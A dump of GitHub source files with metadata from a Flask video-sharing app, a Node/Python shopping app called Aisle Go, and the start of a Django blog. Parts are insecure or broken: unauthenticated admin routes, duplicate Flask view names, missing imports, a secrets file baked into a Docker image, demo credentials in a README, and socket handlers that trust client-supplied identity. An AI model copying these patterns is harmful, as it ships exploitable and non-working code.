backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n\n headers = self.generate_header('weibo_id01')\n\n _data = {\n 'user_id':user1['id'],\n 'post_id':post1['id']\n }\n resp = self.client.post('/post/like',data=json.dumps(_data),\n headers=headers,content_type='application/json')\n\n data_get = json.loads(resp.data)\n assert data_get['like_count'] == 1\n\n\n resp = self.client.post('/post/unlike',data=json.dumps(_data),\n headers=headers,content_type='application/json')\n\n data_get = json.loads(resp.data)\n assert data_get['like_count'] == 0\n" }, { "alpha_fraction": 0.6138541102409363, "alphanum_fraction": 0.6210390329360962, "avg_line_length": 24.710901260375977, "blob_id": "a30200bebc4d6ccc5048f07c4410d0d10b25300c", "content_id": "e0a5e2c9d58b6f1daf4068b2939874a93bf88340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5428, "license_type": "no_license", "max_line_length": 88, "num_lines": 211, "path": "/motiky/views/admin.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport os\nimport sys \nimport time\nimport uuid\nimport logging\nfrom datetime import datetime\n\nimport requests\n\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom werkzeug import secure_filename\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\nfrom motiky.logic.models import User,Post,Report,Install,\\\n UserFollowAsso,UserLikeAsso,Comment,Activity,Tag,Tagging,\\\n CmsUser,Storage\n\nfrom motiky.upyun import UpYun,md5,md5file\n\ninstance = Blueprint('admin',__name__)\n\nupYun = UpYun('xxxxxx','xxxxxx','xxxxxx')\nupYun.setApiDomain('v0.api.upyun.com')\nupYun.debug = True\n\[email protected]('/users')\ndef users_list():\n page = request.values.get('page','1')\n try:\n page = int(page)\n except:\n page = 1\n\n _users = User.query.order_by(User.date_create.desc()).limit(20).\\\n offset((page - 1) * 20).all()\n\n users_count = User.query.count()\n\n users = []\n for u in _users:\n us = u.json\n users.append(us)\n\n total_page = (users_count + 19) / 20\n \n return render_template('user_list.html',users=users,page=page,total_page=total_page)\n\n\[email protected]('/posts')\ndef post_list():\n page = request.values.get('page','1')\n try:\n page = int(page)\n except:\n page = 1\n\n _posts = Post.query.order_by(Post.date_create.desc()).limit(20).\\\n offset((page - 1) * 20).all()\n \n posts_count = Post.query.count()\n\n posts = []\n for po in _posts:\n pos = po.json\n user = po.user.json\n pos['user'] = user\n posts.append(pos)\n\n total_page = (posts_count + 19) / 20\n \n return render_template('post_list.html',posts=posts,count=posts_count,\n page=page,total_page=total_page)\n\[email protected]('/post/<int:post_id>/recommend')\ndef post_recommend(post_id):\n post = Post.query.get(post_id)\n post.recommended = True\n db.session.commit()\n return redirect('/admin/posts')\n\[email protected]('/post/<int:post_id>/not_recommend')\ndef post_recommend(post_id):\n post = Post.query.get(post_id)\n post.recommended = False\n db.session.commit()\n return redirect('/admin/posts')\n\[email protected]('/post/<int:post_id>/show')\ndef post_recommend(post_id):\n post = Post.query.get(post_id)\n post.show = True\n db.session.commit()\n return redirect('/admin/posts')\n\[email protected]('/post/<int:post_id>/hide')\ndef post_recommend(post_id):\n post = Post.query.get(post_id)\n post.show = False\n db.session.commit()\n return redirect('/admin/posts')\n\[email protected]('/tags')\ndef tag_list():\n page = request.values.get('page','1')\n try:\n page = int(page)\n except:\n page = 1\n\n _tags = Tag.query.order_by(Post.date_create.desc()).limit(20).\\\n offset((page - 1) * 20).all()\n \n tags_count = Tag.query.count()\n\n tags = []\n for t in _tags:\n t = t.json\n tags.append(t)\n\n total_page = (tags_count + 19) / 20\n \n return render_template('tag_list.html',tags=tags,\n page=page,total_page=total_page)\n\[email protected]('/add_tag')\ndef add_tag():\n if request.method == 'GET':\n return render_template('add_tag.html')\n\n name = request.values.get('name')\n pic_url = request.values.get('pic_url')\n order_seq = request.values.get('order_seq')\n show = request.values.get('show') == 'true' or False\n recommended = request.values.get('recommended') == 'true' or False\n\n tag = Tag()\n tag.name = name\n tag.pic_url = pic_url\n tag.order_seq = order_seq\n tag.show = show\n tag.recommended = recommended\n\n try:\n db.session.add(tag)\n db.session.commit()\n except:\n db.session.rollback()\n raise\n else:\n return redirect('/admin/tags')\n\[email protected]('/tag/<int:tag_id>/edit')\ndef edit_tag(tag_id):\n tag = Tag.query.get(tag_id)\n\n if request.method == 'GET':\n return render_template('edit_tag.html',tag=tag.json)\n\n name = request.values.get('name')\n pic_url = request.values.get('pic_url')\n order_seq = request.values.get('order_seq')\n show = request.values.get('show') == 'true' or False\n recommended = request.values.get('recommended') == 'true' or False\n\n tag.name = name\n tag.pic_url = pic_url\n tag.order_seq = order_seq\n tag.show = show\n tag.recommended = recommended\n\n try:\n db.session.commit()\n except:\n db.session.rollback()\n raise\n else:\n return redirect('/admin/tags')\n\n\[email protected]('/upload',methods=['POST','GET'])\ndef upload():\n if request.method == 'GET':\n return render_template('upload.html',file_name='')\n\n pic_file = request.files.get('upload')\n fname = secure_filename(pic_file.filename)\n extn = os.path.splitext(fname)[1]\n cname = '/' + str(uuid.uuid4()) + str(extn)\n pic_data = strutil.read_data(pic_file)\n upYun.writeFile(cname,pic_data)\n \n cname = upyun_prefix + cname\n return render_template('upload.html',file_name=cname)\n\n\n\n" }, { "alpha_fraction": 0.5363573431968689, "alphanum_fraction": 0.5702043175697327, "avg_line_length": 33.687686920166016, "blob_id": "8c7f7069f71a096ddc91c337e5de6c2770b7e5a0", "content_id": "fb2d840a75449d6e11e697bee1b66c03f7f2c36d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11552, "license_type": "no_license", "max_line_length": 83, "num_lines": 333, "path": "/tests/test_backend.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action,Tag,Tagging\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestUserLogic(TestCase):\n\n def test_get_user(self):\n user = User(username='username01',photo_url='photo_url01',uid='weibo_id01')\n db.session.add(user)\n db.session.commit()\n\n _user = backend.get_user(user.id)\n assert _user['username'] == user.username\n\n\n def test_add_user(self):\n user = backend.add_user('username','photo_url','weibo_id')\n assert user['username'] == 'username'\n\n def test_set_user(self):\n user = backend.add_user('username','photo_url','weibo_id')\n _user = backend.set_user(user['id'],{'username':'username2',\n 'photo_url':'photo_url2'})\n assert _user['username'] == 'username2'\n\n def test_get_user_by_uid(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n \n user = backend.get_user_by_uid(user1['uid'])\n assert user['username'] == user1['username']\n\n users = backend.get_user_by_uid([user1['uid'],user2['uid']])\n assert len(users) == 2\n\n\n def test_follow_user(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n\n ret = backend.follow_user(user1['id'],user2['id'])\n assert ret > 0\n\n def test_unfollow_user(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n\n ret = backend.follow_user(user1['id'],user2['id'])\n\n ret = backend.unfollow_user(user1['id'],user2['id'])\n assert ret == True\n\n def test_is_following_user(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n\n backend.follow_user(user1['id'],user2['id'])\n ret = backend.is_following_user(user1['id'],user2['id'])\n assert ret == True\n\n def test_get_user_following(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n user3 = backend.add_user('username03','photo_url03','weibo_id03')\n\n backend.follow_user(user1['id'],user2['id'])\n backend.follow_user(user1['id'],user3['id'])\n\n users = backend.get_user_following(user1['id'])\n assert len(users) == 2\n\n count = backend.get_user_following_count(user1['id'])\n assert count == 2\n\n def test_get_user_follower(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n user3 = backend.add_user('username03','photo_url03','weibo_id03')\n\n backend.follow_user(user2['id'],user1['id'])\n backend.follow_user(user3['id'],user1['id'])\n\n users = backend.get_user_follower(user1['id'])\n assert len(users) == 2\n \n count = backend.get_user_follower_count(user1['id'])\n assert count == 2\n \n\nclass TestPostLogic(TestCase):\n\n def test_get_post(self):\n user = backend.add_user('username','photo_url','weibo_id')\n post = Post(title='title',author_id=user['id'],pic_small='pic_small')\n db.session.add(post)\n db.session.commit()\n\n _post = backend.get_post(post.id)\n assert _post['title'] == 'title'\n\n def test_add_post(self):\n user = backend.add_user('username','photo_url','weibo_id')\n post = backend.add_post('title',user['id'],'video_url',\n pic_small='pic_small')\n \n assert post['title'] == 'title'\n\n post = backend.set_post(post['id'],{'title':'title2'})\n assert post['title'] == 'title2'\n\n def test_get_user_post(self):\n user = backend.add_user('username','photo_url','weibo_id')\n post1 = backend.add_post('title1',user['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user['id'],'video_url',\n pic_small='pic_small')\n \n posts = backend.get_user_post(user['id'])\n assert len(posts) == 2\n\n count = backend.get_user_post_count(user['id'])\n assert count == 2\n\n\n def test_get_user_liked_post(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n user2 = backend.add_user('username2','photo_url','weibo_id2')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n\n ula1 = UserLikeAsso(user_id=user2['id'],post_id=post1['id'])\n ula2 = UserLikeAsso(user_id=user2['id'],post_id=post2['id'])\n db.session.add(ula1)\n db.session.add(ula2)\n db.session.commit()\n\n posts = backend.get_user_liked_post(user2['id'])\n assert len(posts) == 2\n\n count = backend.get_user_liked_post_count(user2['id'])\n assert count == 2\n\n\n def test_add_like(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n\n ret = backend.add_like(user1['id'],post1['id'])\n assert ret == 1\n\n ret = backend.del_like(user1['id'],post1['id'])\n assert ret == True\n\n def test_is_like_post(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n\n backend.add_like(user1['id'],post1['id'])\n backend.add_like(user1['id'],post2['id'])\n\n ret = backend.is_like_post(user1['id'],[post1['id'],post2['id']])\n assert ret[post1['id']] == True\n\n\nclass TestActivityLogic(TestCase):\n\n def test_add_activity(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n user2 = backend.add_user('username2','photo_url','weibo_id2')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n\n ac1 = {\n 'post_id':post1['id'],\n 'from_id':user1['id'],\n 'to_id':user2['id'],\n 'atype':'like'\n }\n ac2 = {\n 'post_id':post1['id'],\n 'from_id':user1['id'],\n 'to_id':user2['id'],\n 'atype':'comment'\n }\n\n ret = backend.add_activity(ac1)\n assert ret['to_id'] == user2['id']\n ret = backend.add_activity(ac2)\n\n rets = backend.get_activity_by_user(user2['id'])\n assert len(rets) == 2\n\n\nclass TestOtherLogic(TestCase):\n\n def test_new_install(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n device_token = '1234567890'\n install = backend.new_install(user1['id'],device_token)\n assert install['device_token'] == device_token\n\n install = backend.get_install_by_user(user1['id'])\n\n assert install['device_token'] == device_token\n\n install = backend.set_install(user1['id'],{'badge':20})\n print install\n assert install['badge'] == 20\n\n def test_add_file_data(self):\n st = backend.add_file_data(10,'1234567890')\n st = backend.add_file_data(10,'123243435454545')\n assert len(st) == 36\n\nclass TestCommentLogic(TestCase):\n\n def test_comment(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n user2 = backend.add_user('username2','photo_url','weibo_id2')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n\n \n comment1 = backend.add_comment(post1['id'],'comment1',user2['id'])\n assert comment1['post_id'] == post1['id']\n\n comment2 = backend.add_comment(post1['id'],'comment2',user2['id'])\n \n comments = backend.get_post_comment(post1['id'])\n\n assert len(comments) == 2\n \n ret = backend.get_post_comment_count(post1['id'])\n assert ret == 2\n\nclass TestTagLogic(TestCase):\n\n def test_tag(self):\n\n tag1 = Tag(name='tag1',show=True,pic_url='pic_url',\n recommended=True)\n tag2 = Tag(name='tag2',show=True,pic_url='pic_url',\n recommended=True)\n db.session.add(tag1)\n db.session.add(tag2)\n db.session.commit()\n\n tags = backend.get_all_tags()\n assert len(tags) == 2\n\n tags = backend.get_recommend_tags()\n assert len(tags) == 2\n\n tag = backend.get_tag(tag1.id)\n\n assert tag['name'] == 'tag1'\n \n user = backend.add_user('username','photo_url','weibo_id')\n post1 = backend.add_post('title1',user['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user['id'],'video_url',\n pic_small='pic_small')\n\n tagging1 = Tagging(taggable_type='post',taggable_id=post1['id'],\n tag_id=tag1.id)\n tagging2 = Tagging(taggable_type='post',taggable_id=post2['id'],\n tag_id=tag1.id)\n \n db.session.add(tagging1)\n db.session.add(tagging2)\n db.session.commit()\n\n posts = backend.get_tag_post(tag1.id)\n assert len(posts) == 2\n\n post_count = backend.get_tag_post_count(tag1.id)\n assert post_count == 2\n \n \nclass TestFeedLogic(TestCase):\n\n def test_get_latest_feed(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n user3 = backend.add_user('username03','photo_url03','weibo_id03') \n user4 = backend.add_user('username04','photo_url04','weibo_id04')\n\n post1 = backend.add_post('title01',user1['id'],'video_url01',\n pic_small='pic_small01')\n post2 = backend.add_post('title02',user2['id'],'video_url02',\n pic_small='pic_small')\n post3 = backend.add_post('title03',user3['id'],'video_url03',\n pic_small='pic_small03')\n post4 = backend.add_post('title04',user4['id'],'video_url04',\n pic_small='pic_small04')\n\n backend.follow_user(user4['id'],user1['id'])\n backend.follow_user(user4['id'],user2['id'])\n \n\n ret = backend.get_latest_feed(user4['id'],limit=10,offset=0)\n assert len(ret) == 3\n\n backend.set_post(post3['id'],{'recommended':True})\n\n ret = backend.get_latest_feed(user4['id'],limit=10,offset=0)\n assert len(ret) == 4\n\n" }, { "alpha_fraction": 0.6107403635978699, "alphanum_fraction": 0.6199555397033691, "avg_line_length": 29.230770111083984, "blob_id": "d30c4dce8d52192569bcad07d392aea70a0d8377", "content_id": "fbd7752fee2968032b3e0893709a42d06a9491d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3147, "license_type": "no_license", "max_line_length": 90, "num_lines": 104, "path": "/motiky/views/activity.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit <[email protected]>\n# date: 2013-04-10\n\nimport sys \nimport time\nimport logging\nimport traceback\nfrom datetime import datetime\n\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\nfrom motiky.cacheutil import rcache\nfrom motiky.configs import rq,redis\n\ninstance = Blueprint('activity',__name__)\n\nACTIVITY_UPDATE_TIME_KEY = 'ACTIVITY::UPDATETIME::%(user_id)s'\n\n# atype follow like comment post_reco text\n\ndef filter_activity(ac):\n # todo\n if ac['atype'] in ('follow','like','comment'):\n _user = rcache(3600*24)(backend.get_user)(ac['from_id'])\n ac.update({'user':_user})\n\n if ac['atype'] in ('like','comment','post_reco'):\n _post = rcache(3600*24)(backend.get_post)(ac['post_id'])\n ac.update({'post':_post})\n\n if ac['atype'] in ('comment'):\n _comment = rcache(3600*24)(backend.get_comment)(ac['comment_id'])\n ac.update({'comment':_comment})\n\n return ac\n\nclass UserNewActivityCountView(MethodView):\n\n def get(self,user_id):\n activity_time_meta = redis.hgetall(ACTIVITY_UPDATE_TIME_KEY % \\\n {'user_id':user_id})\n try:\n last_update_time = int(activity_time_meta.get('last_update_time'))\n except:\n last_update_time = int(time.time())\n\n last_update_time = datetime.fromtimestamp(last_update_time)\n count = backend.get_new_activity_count(user_id,last_update_time)\n\n return jsonify(count=count)\n\nclass UserActivityView(MethodView):\n\n def get(self,user_id):\n acs = backend.get_activity_by_user(user_id)\n ac_list = []\n for ac in acs:\n try:\n ac = filter_activity(ac)\n except:\n traceback.print_exc()\n continue\n ac_list.append(ac)\n\n try:\n _user = backend.get_user(user_id)\n except BackendError,ex:\n traceback.print_exc()\n try:\n backend.set_install(user_id,{'badge':0})\n rq.enqueue('motiky.worker.apns_push',\n user_id=user_id,data={\n 'badge':0\n })\n except BackendError,ex:\n traceback.print_exc()\n\n redis.hset(ACTIVITY_UPDATE_TIME_KEY % {'user_id':user_id},\n 'last_update_time',int(time.time()))\n\n return jsonify(results=ac_list)\n\nuser_activity_func = UserActivityView.as_view('user_activity')\nuser_new_activity_count_func = UserNewActivityCountView.as_view('user_new_activity_count')\n\ninstance.add_url_rule('/user/<int:user_id>/activity',\n view_func=user_activity_func,methods=['GET'])\n\ninstance.add_url_rule('/user/<int:user_id>/activity/count',\n view_func=user_new_activity_count_func,methods=['GET'])\n\n\n\n" } ]
43
felixjchen/aisle-go
https://github.com/felixjchen/aisle-go
a1539e41c091ee697c078ccb70c1204dfdb9c053
a54a41b0c19e4b8e5ce3e08072e2876646f5f780
5ddec3ef01c3e9c21b98b4ab681e205b704576f2
refs/heads/master
2023-06-30T19:44:37.463258
2020-10-12T17:41:17
2020-10-12T17:41:17
279,742,521
0
0
null
2020-07-15T02:31:37
2020-10-12T17:41:20
2021-08-05T00:44:48
JavaScript
[ { "alpha_fraction": 0.5565455555915833, "alphanum_fraction": 0.5664839148521423, "avg_line_length": 29.082473754882812, "blob_id": "d73e9ea434085aee45bdd1c432afd4c4b2feb47d", "content_id": "88d40121f6b95712ae4bea0ea3e1b7f99a4c0927", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2918, "license_type": "no_license", "max_line_length": 82, "num_lines": 97, "path": "/src/recommendation/recommendItems.py", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "import json\n\n\ndef jsonLoad(filePath='../db/history.json'):\n with open('db/history.json', 'r') as f:\n data = json.load(f)\n return data\n\n\ndef getShoppingList(data, user):\n for usr in data[\"users\"]:\n if usr == user:\n dataList = data[\"users\"][usr][\"shoppinglist\"]\n shoppingList = []\n for item in dataList:\n if not dataList[item][\"purchase_by\"]:\n shoppingList.append(dataList[item][\"name\"])\n return shoppingList\n return None\n\n\ndef getPruchaseHistory(data, pruchaser, pruchasedFor):\n purchases, allPurchases = [], []\n for usr in data[\"users\"]:\n datalist = data[\"users\"][usr][\"shoppinglist\"]\n for item in datalist:\n if usr == pruchasedFor and datalist[item][\"purchase_by\"] == pruchaser:\n purchases.append(datalist[item][\"name\"])\n if datalist[item][\"purchase_by\"] == pruchaser:\n allPurchases.append(datalist[item][\"name\"])\n return purchases, allPurchases\n\n\ndef getPurchasesFor(purchaser, asker):\n data = jsonLoad()\n itemlib, purchases, allPurchases = {}, {}, {}\n countA, countB, countC = 0, 0, 0\n shoppingList = getShoppingList(data, asker)\n purchaseHistory = getPruchaseHistory(data, purchaser, asker)\n\n for item in shoppingList:\n if item not in itemlib:\n itemlib[item] = 1\n countA = countA + 1\n else:\n itemlib[item] = itemlib[item] + 1\n countA = countA + 1\n\n for item in purchaseHistory[0]:\n if item not in purchases:\n purchases[item] = 1\n countB = countB + 1\n else:\n purchases[item] = purchases[item] + 1\n countB = countB + 1\n\n for item in purchaseHistory[1]:\n if item not in allPurchases:\n allPurchases[item] = 1\n countC = countC + 1\n else:\n allPurchases[item] = allPurchases[item] + 1\n countC = countC + 1\n\n if countA == 0:\n countA = 1\n if countB == 0:\n countB = 1\n if countC == 0:\n countC = 1\n\n probItem = {}\n for item in purchases:\n if item not in probItem:\n probItem[item] = 0.6 * purchases[item] / countB\n\n for item in allPurchases:\n if item not in probItem:\n probItem[item] = 0.4 * allPurchases[item] / countC\n else:\n probItem[item] = probItem[item] + \\\n (0.4 * allPurchases[item] / countC)\n\n assignProb = {}\n for item in itemlib:\n if item in probItem:\n assignProb[item] = probItem[item]\n\n return probItem, assignProb\n\n\nif __name__ == \"__main__\":\n purchaser = \"[email protected]\"\n asker = \"[email protected]\"\n probItem, assignProb = getPurchasesFor(purchaser, asker)\n print(\"All the items purchased by {}: {}\".format(purchaser, probItem))\n print(\"Prob for the items on {} list: {}\".format(asker, assignProb))\n" }, { "alpha_fraction": 0.7363057136535645, "alphanum_fraction": 0.7464967966079712, "avg_line_length": 23.53125, "blob_id": "fef4f471608f0de186e7bb72e2a90a0a2ea25ee7", "content_id": "4fdb61864eef53fdb91808ad09b4936e7e74908b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 791, "license_type": "no_license", "max_line_length": 120, "num_lines": 32, "path": "/README.md", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "# Aisle Go\n\n## Summary\nAisle Go - as in “I’ll go shopping for you” - is a web app designed to bring safety and accessibility to the population.\n- https://redsweater.netlify.app/\nCreated for IBM Summer 2020 Intern hackathon\n\n## Technology\n- IBM Cloud CouchDB\n- IBM Carbon Components\n- Express.js, socket.io, bcrypt\n- Netlify\n- Docker Hub container, continous building with GitHub integration\n- Azure backend, continous delivery by webhook\n \n## Future\n - Integrate exisiting recommendation system, leverage newer AI techniques\n - Blockchain\n - Authorization\n \n## Credentials user:pass\n- [email protected]:a\n- [email protected]:b\n- [email protected]:c\n- [email protected]:d\n- [email protected]:e\n \nBackend\n- https://redsweater.azurewebsites.net/\n\nDockerhub\n- https://hub.docker.com/repository/docker/felixchen1998/redsweater/builds\n" }, { "alpha_fraction": 0.702479362487793, "alphanum_fraction": 0.7272727489471436, "avg_line_length": 11.199999809265137, "blob_id": "5d6c33f19d921965461e5e18ad4d644e7ffb50fa", "content_id": "f839f3b078e451883c493ad3f506eeb2646dd1f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 121, "license_type": "no_license", "max_line_length": 19, "num_lines": 10, "path": "/src/backend/Dockerfile", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "FROM node:14.2\n\nCOPY package.json .\nRUN npm install\n\nCOPY secrets.json .\nCOPY couchdb.js .\nCOPY app.js .\n\nCMD node app.js" }, { "alpha_fraction": 0.6356046795845032, "alphanum_fraction": 0.6367328763008118, "avg_line_length": 24.1875, "blob_id": "8c54895d033f5089bee2fc779e6e7904b615e52b", "content_id": "c6cc7e5a0d903ac522d61caa1e07961ea7505edb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4432, "license_type": "no_license", "max_line_length": 89, "num_lines": 176, "path": "/src/backend/app.js", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "const app = require('express')();\nconst http = require('http').Server(app);\nconst io = require('socket.io')(http);\nconst port = process.env.PORT || 80;\nconst {\n v4: uuidv4\n} = require(\"uuid\");\nconst {\n addUser,\n getUser,\n auth,\n addFriend,\n addShoppingItem,\n getFriends,\n getFriendsProfiles,\n addForFriend,\n updatePurchase,\n} = require(\"./couchdb\")\n\nvar socketToEmail = {}\nvar emailToSocket = {}\nvar emailToFriends = {}\n\napp.get('/', function (req, res) {\n res.send('redsweater backend');\n});\n\n\nio.on(\"connect\", (socket) => {\n // either with send()\n socket.send(\"Hello from websocket backend!\");\n\n socket.on(\"loginAttempt\", async (email, password, callback) => {\n let r = await auth(email, password)\n\n // Fail\n if (!r.status) {\n callback(r)\n }\n\n emailToSocket[email] = socket.id\n socketToEmail[socket.id] = email\n emailToFriends[email] = user.friends\n callback(r)\n })\n\n socket.on(\"addItemAttempt\", async (email, item, callback) => {\n\n let itemID = uuidv4()\n item['in_list'] = \"\"\n item['purchase_by'] = \"\"\n\n // Tell all my friends new item\n let friendSockets = getFriendSockets(socket.id)\n let myEmail = socketToEmail[socket.id]\n friendSockets.forEach(friendSocket => {\n // Update feed\n let msg = `${email} has added ${item.name} to their cart`\n io.to(friendSocket).emit('updateFeed', msg);\n\n // Add item to friends list\n io.to(friendSocket).emit('friendNewItem', myEmail, itemID, item);\n })\n\n let r = {\n status: await addShoppingItem(email, itemID, item),\n itemID\n }\n\n callback(r)\n })\n\n socket.on(\"addFriendAttempt\", async (email, friendEmail, callback) => {\n\n let r = {\n status: await addFriend(email, friendEmail),\n user: await getUser(email),\n friends: await getFriendsProfiles(email)\n }\n\n // Only if add friend is succesful\n if (r.status) {\n emailToFriends[email].push(friendEmail)\n emailToFriends[friendEmail].push(email)\n\n // Tell all my friends feeds\n let friendSockets = getFriendSockets(socket.id)\n friendSockets.forEach(friendSocket => {\n let msg = `${email} and ${friendEmail} are now friends`\n io.to(friendSocket).emit('updateFeed', msg);\n })\n\n // new friend rerender\n let friendSocket = emailToSocket[friendEmail]\n let f = {\n user: await getUser(friendEmail),\n friends: await getFriendsProfiles(friendEmail)\n }\n io.to(friendSocket).emit('render', f);\n\n // I render\n callback(r)\n }\n })\n\n\n socket.on(\"claimForFriendAttempt\", async (email, friendEmail, itemID, callback) => {\n\n let r = {\n item: await addForFriend(email, friendEmail, itemID),\n user: await getUser(email),\n friends: await getFriendsProfiles(email)\n }\n\n // Tell all my friends, that email claimed friendEmail's item\n let friendSockets = getFriendSockets(socket.id)\n friendSockets.forEach(friendSocket => {\n let msg = `${email} is going to get ${r.item.name} for ${friendEmail}`\n io.to(friendSocket).emit('updateFeed', msg);\n\n io.to(friendSocket).emit('friendClaimed', email, itemID)\n })\n\n callback(r)\n })\n\n\n socket.on(\"purchaseForFriendAttempt\", async (email, friendEmail, itemID, callback) => {\n console.log(email, friendEmail, itemID)\n let r = {\n item: await updatePurchase(friendEmail, itemID, email)\n }\n\n if (r.item != false) {\n\n // tell friend rerender\n let friendSocket = emailToSocket[friendEmail]\n let f = {\n user: await getUser(friendEmail),\n friends: await getFriendsProfiles(friendEmail)\n }\n io.to(friendSocket).emit('render', f);\n\n // Tell all my friends feeds\n let friendSockets = getFriendSockets(socket.id)\n friendSockets.forEach(friendSocket => {\n let msg = `${email} has purchased ${r.item.name} for ${friendEmail}`\n io.to(friendSocket).emit('updateFeed', msg);\n })\n\n callback(r)\n }\n\n })\n});\n\nconst getFriendSockets = (mySocketID) => {\n let myEmail = socketToEmail[mySocketID]\n let friendEmails = emailToFriends[myEmail]\n let friendSockets = []\n\n friendEmails.forEach(friendEmail => {\n if (friendEmail in emailToSocket) {\n friendSockets.push(emailToSocket[friendEmail])\n }\n });\n\n return friendSockets\n}\n\n\nhttp.listen(port, function () {\n console.log('listening on *:' + port);\n});\n\n// https://github.com/socketio/chat-example" }, { "alpha_fraction": 0.774193525314331, "alphanum_fraction": 0.8602150678634644, "avg_line_length": 46, "blob_id": "a54f8a2d4f12bc93cbd263792700885020aac9cd", "content_id": "c1a9a971da30c32c9a39427e5a074c21f5c02454", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 93, "license_type": "no_license", "max_line_length": 49, "num_lines": 2, "path": "/src/backend/buildAndPush.sh", "repo_name": "felixjchen/aisle-go", "src_encoding": "UTF-8", "text": "docker build -t felixchen1998/redsweater:latest .\ndocker push felixchen1998/redsweater:latest" } ]
5
arbaazkhan07/Django-MiniBlog
https://github.com/arbaazkhan07/Django-MiniBlog
2b390b91e9cc6d38f5b6a5865c11083c88e379cf
a8139376ab443961528e9d18bb0954a2e36efb11
f50ce5efa231602c3425d497244464843c077bf0
refs/heads/master
2023-06-20T15:02:12.100842
2021-07-14T11:34:47
2021-07-14T11:34:47
385,917,570
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5821325778961182, "alphanum_fraction": 0.5821325778961182, "avg_line_length": 31.3389835357666, "blob_id": "62a3bda00d2a8ed25d740d64864118af46c2c8c5", "content_id": "d401cba5038b6e74baf39440dce2965bc2f5d0a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3817, "license_type": "no_license", "max_line_length": 106, "num_lines": 118, "path": "/app/views.py", "repo_name": "arbaazkhan07/Django-MiniBlog", "src_encoding": "UTF-8", "text": "from django.shortcuts import redirect, render\nfrom .forms import UserRegisterForm, UserLoginForm, PostForm\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom .models import Post\nfrom django.contrib.auth.models import Group\n\n# Home \ndef home(request):\n posts = Post.show_posts()\n return render(request, 'app/home.html',{ 'posts': posts})\n\n# About \ndef about(request):\n return render(request, 'app/about.html')\n\n# Contact \ndef contact(request):\n return render(request, 'app/contact.html')\n\n# 